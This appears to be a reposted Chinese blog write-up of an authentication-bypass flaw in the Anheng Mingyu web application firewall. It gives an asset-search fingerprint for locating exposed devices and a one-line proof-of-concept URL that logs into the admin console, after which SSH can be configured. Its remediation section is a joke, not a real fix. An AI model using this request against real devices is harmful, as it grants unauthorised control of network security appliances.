安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞

安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞

  • 一、漏洞描述
  • 二、漏洞影响
  • 三、网络测绘
  • 四、漏洞复现
  • 总结:
  • 五、修复建议

一、漏洞描述

安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台

二、漏洞影响

安恒 明御WEB应用防火墙

三、网络测绘

app=“安恒信息-明御WAF”

四、漏洞复现

登录页面

安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞_第1张图片
验证POC

/report.m?a=rpc-timed

安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞_第2张图片
再访问主页面跳转配置页面

安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞_第3张图片
发送请求包配置系统SSH等

安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞_第4张图片

总结:

漏洞太傻,本人检测工具懒得写

五、修复建议

辞退研发就可以

你可能感兴趣的:(网络安全漏洞复现,安全,网络,服务器)